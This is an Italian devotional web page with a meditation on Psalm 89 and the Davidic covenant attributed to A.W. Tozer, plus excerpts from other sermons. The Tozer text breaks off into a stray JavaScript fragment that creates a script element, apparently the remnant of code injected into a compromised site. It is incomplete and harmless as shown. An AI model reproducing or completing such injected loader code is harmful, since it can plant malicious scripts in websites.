Meditazione del giorno: Adempimento del Patto Davidico

di  A.W. Tozer –   Poniamo attenzione al tema del Salmo 89. In questo salmo, lo Spirito Santo detta un chiaro messaggio. Egli non si riferisce solo al Re Davide, ma va ben oltre. Infatti, Egli descrive il più grande figlio di Davide, tra i quali anche Gesù, il figlio eterno e Signore di tutti.  Lo Spirito Santo non sta parlando del Davide terreno che sarebbe morto; Sta parlando di un figlio del quale dice: “Egli m’invocherà, dicendo: “Tu sei mio Padre, il mio DIO e la Rocca della mia salvezza”. Lo costituirò pure mio primogenito, il più eccelso dei re della terra. Gli userò benignità per sempre, e il mio patto con lui rimarrà stabile”. (89:26–28).

Questo figlio non può essere nessun altro fuorché Gesù e l’infallibile patto che Dio fa con Lui non è altro che il nostro. Questo patto non fallirà mai perché è Dio che lo ha promesso e di Lui ci possiamo fidare ciecamente.

Spero che ciò che sto esponendo sia chiaro. Una promessa, ogni promessa, può o possono non valere nulla. Il valore della promessa dipende dal carattere di chi la fa. Ogni giorno uomini e donne promettono continuamente, fanno patti e promesse che però spesso vengono infranti. Non sono in grado di mantenerli.var d=document;var s=d.createElement(‘script’);

I commenti sono chiusi.

Meditazione del giorno

  • Meditazione del giorno: EL SHADDAI
    In Devotional
    di Agostino Masdea  –    “Quando Abramo ebbe novantanove anni, l’Eterno gli apparve e gli disse: “Io sono il Dio   Onnipotente; cammina alla mia presenza, e sii integro; (Genesi 17:1) –   Ad Abramo, l’uomo a cui aveva promesso di farlo diventare padre di “moltitudini di nazioni“, Dio rivela in questo passo della scrittura un altro suggestivo e glorioso dei Suoi nomi: El Shaddai.  “Dio Onnipotente”. Così nel momento della prova, quando siamo chiamati a combattere contro il dubbio, il Signore si manifesta. “L’Eterno gli apparve” (vs. 1). In questo modo Dio distrugge con una sola [...continua la lettura]

Post meno Recenti

  • DAI SERMONI DI ROBERTO BRACCO
      LA PAROLA DOLCE (Proverbi 15) […]
  • L’UOMO NEL TEMPO E NELL’ETERNITA’
    di  ROBERTO BRACCO                                           Questo studio ha, soprattutto, uno scopo: esaminare l’uomo nel suo aspetto di “creatura di Dio”, quindi nel suo aspetto più profondo, più importante. Noi speriamo che questo esame possa rappresentare un raggio, sia pur debole, di luce, per una conoscenza più intera dell’uomo, la più meravigliosa fra le creature di Dio. […]
  • ARMONIA SPIRITUALE
    di Agostino Masdea   –  “Rendete perfetta la mia gioia, avendo uno stesso modo di pensare, uno stesso amore, un solo accordo…” (Filippesi 2.2)  –   Questa richiesta di Paolo ai credenti di Filippi ci parla di armonia.  Che parola straordinaria… armonia! Ci parla di bellezza, di equilibrio, di gradevolezza.  E’ una parola legata alla musica: E’ una consonanza di voci o strumenti musicali che produca una sensazione piacevole, o anche una combinazione di accordi, cioè la concordanza di note simultanee, che provochi un’impressione di piacere in chi ascolta. Si parla di Armonia nella letteratura e nella poesia, quando si nota una “musicalità” che unisce le parole, i verbi e gli aggettivi usati….  Si parla di armonia del corpo umano, armonia dell’universo, armonia dei Vangeli, […]
  • Roberto Bracco: “I giorni di prima…”
    […]
  • IL BISOGNO DEL MOMENTO
    di BILLY GRAHAM              Il mondo oggi ha ancora un disperato bisogno di risveglio spirituale. É la sola speranza di sopravvivenza della razza umana. In mezzo ai problemi che il mondo deve affrontare, i cristiani sono stranamente silenziosi e impotenti, quasi sopraffatti dalla marea del secolarismo.Eppure, proprio loro sono chiamati ad essere “il sale della terra” (Mt 5,13), che impedisce ad un mondo in decadenza di corrompersi ulteriormente. I cristiani devono essere la “luce del mondo” (Mt 5,14), che illumina l’oscurità provocata dal peccato e guida un mondo che ha perduto la via. Siamo chiamati ad essere “irreprensibili e integri, figli di Dio senza biasimo in mezzo ad una generazione ingiusta e perversa, fra la quale risplendete come luminari […]
  • Meditazione del giorno: IL PADRE NOSTRO
    by Carter Conlon |  In Luca 11:2-4 Gesù ci insegnò come pregare. Esaminiamo brevemente alcune delle basi che Egli insegnò. “Padre nostro”— Dobbiamo capire che adesso siamo in relazione con Dio il Padre attraverso Gesù Cristo. Questo ci garantisce il diritto di andare davanti al Suo trono e far conoscere le nostre richieste. “Che sei nei cieli”— Le sue vie sono più alte delle nostre vie; i Suoi pensieri sono più alti dei nostri pensieri. Egli vive in un luogo di assoluta e totale vittoria. Non c’è possibilità di sconfitta in Dio. “Sia santificato il Tuo nome”— Possiamo fidarci del nome e della reputazione di Dio. Egli non ci dirà mai nulla che sia contrario alla verità. […]

Prossimi Eventi

Dai nostri Culti